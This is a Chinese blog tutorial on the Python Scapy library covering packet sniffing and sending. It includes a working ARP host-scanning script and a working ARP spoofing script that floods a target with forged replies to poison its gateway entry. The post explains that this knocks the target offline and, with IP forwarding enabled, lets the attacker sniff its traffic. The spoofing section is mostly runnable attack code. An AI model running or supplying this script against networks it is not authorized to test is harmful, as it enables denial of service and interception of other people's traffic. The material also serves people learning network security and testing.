python——ARP主机扫描和ARP欺骗

最新推荐文章于 2023-09-01 17:32:12 发布
最新推荐文章于 2023-09-01 17:32:12 发布
阅读量854 收藏 10
点赞数 1
分类专栏: python 渗透测试工具编写 文章标签: 安全 python arp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kris__zhang/article/details/109014907
版权

一、scapy介绍

scapy是一个可用于网络嗅探的非常强大的第三方库。

具有以下几个特点:

1.交互模式,用作第三方库。

2.可以用开做packet嗅探和伪造packet

3.已经再内部实现了大量的网络协议。(DNS,ARP,IP,TCP,UDP等等),可以用它来编写非常灵活实用的工具。

安装 scapy

pip安装 :pip install scapy
pip install ipython(运行命令行方式需要)
windows下安装scapy需要安装winpcap或者npcap(用于抓取网卡的数据),,,电脑安装果wireshark或者nmap就不用安装winpcap或者npcap
winpcap官方下载地址:https://www.winpcap.org/install/default.htm

测试scapy是否安装好
在这里插入图片描述
能否抓取网卡(不能抓取网卡的话,请检查winpcap或者npcap是否安装成功) 
在这里插入图片描述

sacpy 常用

1.sacpy 嗅探流量包

sniff函数进行嗅探流量,iface表示使用的网卡接口,filter是过滤条件,count是嗅探包的个数。结果显示嗅探到了3个ARP包。可以输入pkts[i]查看包的具体内容。sniff别的参数可以查看帮助文档:help(sniff) 
在这里插入图片描述

2.将嗅探到的包内容写到pcap文件和读取pcap文件

wrpcap 写, rdpcap 读
在这里插入图片描述

3.收发数据包

3.1、send(),在第三层发送数据包,但没有接收功能。其他参数可以查看帮助:help(send)

fuzz函数的作用:可以更改一些默认的不被计算的值(比如校验和checksums),更改的值是随机的,但是是符合字段的值的。 
在这里插入图片描述

3.2、sendp(),在第二层发送数据包,但没有接收功能。"(1,4)"小括号是范围代表1到4,第二个例子:发送4个包,ttl的值是1到4 
在这里插入图片描述
3.3、sr(),在第三层发送数据包,有接收功能

srp同时收到响应数据包和不响应数据包,需要用两个变量来接收。

ans中有请求有响应,unans只有请求没有响应

下图可以看到ans[0]查看的数据是以元组的形式,利用下图的示例可以对特定主机的特定端口进行tcp扫描。
在这里插入图片描述
3.4、sr1(),在第三层发送数据包,有接收功能,但只接收第一个数据包。用于哪些判断和目标是否通,接收一个数据包就能判断,没必要接收多个。

下图可以看到,发送20个包,收到3个包,但只变量m存储一个包。 
在这里插入图片描述
3.5、srloop(),在第三层连续发送数据包,有接收功能,且连续接收数据包。

3.6、srp()、srp1()、srploop()工作在第二层,具体用法可以查看帮助。

四、ARP主机扫描

.使用scapy写一个ARP主机扫描脚本(使用sys模块接收命令行传递的参数)

#局域网主机扫描器  使用ARP扫描
#主机扫描,主机不是写死的,接收命令行传递的参数。
from scapy.all import *
import time
wifi="Intel(R) Dual Band Wireless-AC 3165"
#构造数据包   Ether()层可以省略构造内容,因为默认就是,当然可以写上,可以加快速度
ip=sys.argv[1]
p=Ether(dst="ff:ff:ff:ff:ff:ff",src="b8:81:98:e0:46:6a")/ARP(pdst=ip)
#数据包发送,srp同时收到响应数据包和不响应数据包,需要用两个变量来接收。
#ans中有请求有响应,unans只有请求没有响应
ans,unans=srp(p,iface=wifi,timeout=2)
print("一共扫描到了%d个主机"%len(ans))
result=[]
#ans是元组的形式,可以测试ans[0],发现结果是元组的形式
for s,r in ans:
    result.append([r[ARP].psrc,r[ARP].hwsrc])   #把目标的IP以及MAC地址加入到新的列表

result.sort()   #对列表进行排序
#遍历列表,打印ip以及对应的mac地址
for ip,mac in result:
    print(ip,"--->",mac)

在这里插入图片描述

五.ARP欺骗

ARP欺骗就是攻击者一直发包告诉被攻击者(目标)自己(攻击者)是网卡,欺骗目标的数据经过自己,以实现造成目标不能上网或者对目标数据进行监听的目的。

1.首先查看目标的ARP缓存,可以看到目标原来的网关IP以及对应的mac地址
在这里插入图片描述
2.开始ARP欺骗

#ARP欺骗
from scapy.all import *
import time
#构造包
#pdst是目标IP,psrc是网关的ip
p1=Ether(dst="ff:ff:ff:ff:ff:ff",src="b8:81:98:e0:46:6a")/ARP(pdst="172.20.10.14",psrc="172.20.10.1")
for i in range(6000):
    sendp(p1)
    time.sleep(0.1)

3.运行脚本,可以看到脚本一直发包,这时再看目标的arp缓存,可以看到网关的mac地址变成攻击者的mac了(说明目标把攻击者当成了网关,ARP欺骗成功)
在这里插入图片描述
4.ARP欺骗之后,由于攻击者不是真正的网关,无法转发数据(默认情况下),导致目标不能上网,这就实现了目标的断网攻击了。
5.那么能不能让目标能上网,只对目标进行流量的嗅探呢,答案是有的,需要开启攻击者的路由转发功能,把目标的数据转发出去。
在这里插入图片描述
6.查看是否开启IP路由转发功能 (我这里是没开的 是否)
在这里插入图片描述

刘—手
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ARP主机扫描工具——Python脚本
06-03
简单的ARP主机扫描工具,通过ARP协议配合Python中的socket模块,对某个局域网内的主机进行简单扫描,并输出存活的主机
python arp断网攻击_ARP断网攻击怎么解决
weixin_39778003的博客
12-22 529
本文介绍了遭受ARP攻击时的解决办法,ARP(Address Resolution Protocol,地址解析协议)协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。ARP攻击仅能在以太网(局域网如:机房、内网、公司网络、学校等)进行。ARP攻击就是通过伪造IP地址MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出...
ARP攻击python实现
CODER的博客
04-25 4704
1. 前言 代码参考:https://github.com/byt3bl33d3r/arpspoof/blob/master/arpspoof/arpspoof.py 题目描述: 任务三:网络协议堆栈渗透测试 任务环境说明: 服务器场景:WindowsServer18065 服务器场景操作系统:Windows2003 Server 服务器场景FTP下载服务用户名:anonymous,密码:123...
arp命令(windows ),nmap查看局域网内所有主机IP和MAC
weixin_33924220的博客
07-14 1万+
ARP命令详解    ARP是一个重要的TCP/IP协议,并且用于确定对应IP地址的网卡物理地址。实用arp命令,我们能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外,使用arp命令,也可以用人工方式输入静态的网卡物理/IP地址对,我们可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作,有助于减少网络上的信息量。   按照缺省设置,ARP高速缓存中的项目是动...
python第三方库scapy中的sniff函数里的iface参数如何设置?
weixin_43356308的博客
02-04 4015
自己最近想通过python一个程序来不定时捕获主机的DNS流量,使用了python中第三方库scapy。 scapy中有sniff中的iface是网卡 的名称, 但是我查看了很多的资料也没有对他有详细描述。 最终,查到了两个获取这个参数的方法: 一,通过show_interfaces() from scapy.all import * #显示网卡信息 show_interfaces() 二,通过cmd中输入 ipconfig /all获取对应网卡的描述 ` ......
python+scapy 抓包与解析
热门推荐
B0rn_T0_W1n的博客
05-09 8万+
python scapy 抓包 解析
python3扫描指定目标IP端口的脚本
IT运维技术圈
05-15 370
该脚本使用了Python的socket模块来进行网络连接和通信,并利用concurrent.futures模块实现了并发扫描。它接受三个命令行参数:目标IP地址、起始端口和结束端口。如果没有提供这些参数,脚本将打印出用法信息并退出。脚本使用多线程并发扫描指定的端口范围,如果端口开放,则打印出端口号、协议类型和“开放”字样。扫描计时,端口开放的协议执行效果:脚本 importsys import...
Python构造ARP请求、扫描、欺骗
点滴技术的博客
09-28 2373
[TOC] 0. ARP介绍 首先,先回忆下TCP/IP模型,从下到上分为:数据链路层、网络层、传输层、应用层,那么ARP到底属于哪一层?有人会说是网络层,但实际是属于数据链路层,只不过还要为网络层提供服务。 ARP的主要用途是IP(32bit)地址到物理MAC(48bit)地址的映射关系。别看表面主机知道了远端IP地址就可以通信,实则先要知道远端的MAC地址(借助ARP),通过网卡到交...
python3+scapy扫描获取局域网主机ip和mac
##$_$##
05-08 1万+
python3+scapy扫描获取局域网主机ip和mac
pythonarp工具_Python 实现ARP扫描欺骗工具
weixin_39900531的博客
12-05 361
实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址.from scapy.all import *from optparse import OptionParserimport threadingdef parse_ip(targets):_split = targets.split('-')first_ip =...
python使用arp欺骗伪造网关的方法
09-22
主要介绍了python使用arp欺骗伪造网关的方法,涉及Python伪造网关的相关技巧,需要的朋友可以参考下
研讨三_python_arp欺骗python实现_
10-01
python的scrpyarp欺骗
python网络编程——实现ARP协议
12-23
1.通过python psutil模块,并对网卡名称进行筛选得到对应网卡的IP地址MAC地址 2.使用scapy库中的srp()函数发送二层数据包并获得返回值 3.使用type()函数分析返回值类型,查询对应的类中的方法,来提取关键信息 ...
python-pip加速
Kris__zhang的博客
05-31 1万+
windows配置pip加速 一、临时配置进行加速 比如,要加速下载pytest包,命令如下: #阿里源加速 pip install pytest -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com #清华源加速 pip install pytest -i https://pypi.tuna.tsinghua.edu.cn/simple/ 二、永久性加速配置 1、找到pip在Windows下的配置文件 命
pythonudp端口扫描工具全
Kris__zhang的博客
03-15 3418
利用python的socket库了一个udp的端口扫描的脚本 什么是 Socket? Socket又称"套接字",应用程序通常通过"套接字"向网络发出请求或者应答网络请求,使主机间或者一台计算机上的进程间可以通讯。 直接上代码 import sys,time import socket def scan(host,port): print("") print('Server %s,Port:%s is scaning'%(host,port)) #打印ip和端口 try:
python-编base64解码加密脚本(可多次加密或者解密)
Kris__zhang的博客
03-25 3123
base64加密 用到的python模块:random、base64 1.txt:需要编码的内容 2.txt:编码后的内容 直接上代码 # -*- coding:utf-8 -*- import random from base64 import * process = { '16': lambda x: b16encode(x), '32': lambda x: b32encode(x), '64': lambda x: b64encode(x), } s = "" with o
python-PyCharm安装使用教程
Kris__zhang的博客
06-02 794
1、下载 Pycharm 在 Pycharm 的官网即可下载:https://www.jetbrains.com/pycharm/download/#section=windows 下载时有两种版本选择Professional(专业版,收费)和Community(社区版,免费) 2、开始安装 Pycharm 第一步,直接点击Next 第二步,如果要修改安装路径,就在这里更改 第三步,需要进行一些设置,没有特殊需要按照图中勾选即可: 如果有特殊需要,请按如下描述确定是否勾选设置: 1、创建快捷方式:根据
目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别(dirsearch_bypass403)
Kris__zhang的博客
09-01 785
dirsearch进行目录扫描—>将所有403状态的目录进行保存–>是否进行jsfind–>是(进行js爬取url和域名,将爬取到的url进行状态码识别如果是403状态则进行保存)–>进行403绕过–>目录进行指纹识别。在安全测试时,安全测试人员信息收集中时可使用它进行目录枚举,目录进行指纹识别,枚举出来的403状态目录可尝试进行绕过,绕过403有可能获取管理员权限。对扫描出来的目录进行指纹识别(结果会自动保存在reports目录下的.josn文件中)对404状态码和0B数据进行过滤不进行指纹识别。
python arp欺骗
最新发布
09-10
ARP欺骗是一种网络攻击技术,通过伪造ARP请求和应答,实现欺骗目标主机的IP与MAC地址的映射关系。这使得攻击者能够截获目标主机的网络流量,并进行中间人攻击或数据篡改等恶意行为。 在Python中,你可以使用Scapy这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值